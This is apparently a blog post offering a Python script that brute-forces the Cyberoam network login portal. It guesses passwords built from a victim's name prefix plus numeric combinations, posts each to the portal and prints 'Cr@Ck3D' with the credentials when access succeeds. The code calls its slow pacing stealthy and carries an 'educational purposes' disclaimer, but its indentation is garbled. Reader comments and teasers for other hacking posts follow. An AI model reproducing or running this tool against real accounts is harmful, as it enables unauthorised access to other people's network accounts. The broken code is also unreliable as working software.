Skip to main content

Cyberoam Login Brute Force Script

Cyberoam Login

#
#  ('-.               .-') _                         ) (`-.               _  .-')
#  ( OO ).-.          (  OO) )                         ( OO ).            ( \( -O )
#  / . --. / ,--.     /     '._     ,------.,--. ,--. (_/.  \_)-.  .----.  ,------.
#  | \-.  \  |  |.-') |'--...__) ('-| _.---'|  | |  |  \  `.'  /  /  ..  \ |   /`. '
#.-'-'  |  | |  | OO )'--.  .--' (OO|(_\    |  | | .-') \     /\ .  /  \  .|  /  | |
# \| |_.'  | |  |`-' |   |  |    /  |  '--. |  |_|( OO ) \   \ | |  |  '  ||  |_.' |
#  |  .-.  |(|  '---.'   |  |    \_)|  .--' |  | | `-' /.'    \_)'  \  /  '|  .  '.'
#  |  | |  | |      |    |  |      \|  |_) ('  '-'(_.-'/  .'.  \  \  `'  / |  |\  \
#  `--' `--' `------'    `--'       `--'     `-----'  '--'   '--'  `---''  `--' '--'
# Cyberaom brute force Script
# @author Vishal Mishra(aLt fux0r)<vishal_mishra@live.com>
#its only for educational purposes.

import urllib
import time
import datetime




#change this section according to your situation
#Best way - attach username and password dictionary
#this is the range of password to check
checkList = range(1,31)
checkList1=range(1,12)
for j in checkList1:
for i in checkList:
      userid ='80123XXX'      #Roll No of Student
      password= 'SAM'+str("%02d"%i)+str("%02d"%j)
       #lets suppose name of victim is SAMAYA then use above combination to break password ;-)
     



dataToSend = urllib.urlencode({'mode': '191','isAccessDenied': '', 'url': '', 'username': userid, 'password': password, 'saveinfo': '',  })
      postRequest = urllib.urlopen("https://172.31.1.6:8090/httpclient.html", dataToSend)
      responseData = postRequest.read()
     
          print responseData
   
         
       
          openURLToCheck = urllib.urlopen("http://www.google.com")
          checkData = openURLToCheck.read()
          c=checkData.count('Google Search')
          if c > 0:
          f=open('cyberoam.py')
lines=f.readlines()
print lines[1]
print lines[2]
print lines[3]
print lines[4]
print lines[5]
print lines[6]
print lines[7]
print lines[8]
print lines[9]
print lines[10]
print lines[11]
print lines[12]
print lines[13]
print '\t\t******************************************'
print '\t\t******************************************'
print '\t\t******************************************'
                print '\t\t---Cyberaom-------------------------------'
              print '\t\t-----------------Cr@Ck3D!!----------------'
              print '\t\t--------------------------by aLt fux0r----'
              print '\t\t\t' +userid
              print '\t\t\t'+password
              print '\t\t******************************************'
              print '\t\t******************************************'
              print '\t\t******************************************'
              exit(1)
             
    # stop after 10 checks: Stealthy
      if i%50 == 0:
          print 'SCAN COMPLETED UPTO ' + str(i)
          time.sleep(2)

Comments

  1. What if I know the default password and want to know the correct user id?

    ReplyDelete
  2. not working on pc although python installed.

    ReplyDelete

Post a Comment

Popular posts from this blog

Hacking Windows 10 UWP App: DLL Injection & common Vulnerabilities

I recently started working on  widows 10 Apps( Apps not Applications) security. Before diving deep in hacking terms lets try to understand what's new in Windows 10 UWP( Universal Platform) as compared to old Apps. Lets begin with how apps actually work on windows 10(desktop/tablet). Now windows 10 comes with a container only for running apps inside the isolated environment. By default, /APPCONTAINER(Linker Flag) is off. This option modifies an executable to indicate whether the app must be run in the appcontainer process-isolation environment. Specify /APPCONTAINER for an app that must run in the appcontainer environment—for example, a Windows Store app. (The option is set automatically in Visual Studio when you create a Windows Store app from a template.) For a desktop app, specify /APPCONTAINER:NO or just omit the option. The /APPCONTAINER option was introduced in Windows 8. Now there is no registry entry concept for these app in the System HIVE rather they install they own hiv

Installing vmware-11.0 on Ubuntu 15.04 Using kernel Patch

curl http://pastie.org/pastes/9934018/download -o /tmp/vmnet-3.19.patch cd /usr/lib/vmware/modules/source tar -xf vmnet.tar patch -p0 -i /tmp/vmnet-3.19.patch tar -cf vmnet.tar vmnet-only rm -r *-only vmware-modconfig --console --install-all References: http://askubuntu.com/questions/605530/vmware-player-7-1-0-on-ubuntu-15-04-kernel-3-19-0-10-generic-app-loading http://askubuntu.com/questions/617704/failed-to-build-vmnet-for-kernel-3-19

SSI Injection Attack

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:  Code: < ! # = / . " - > and [a-zA-Z0-9] Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that th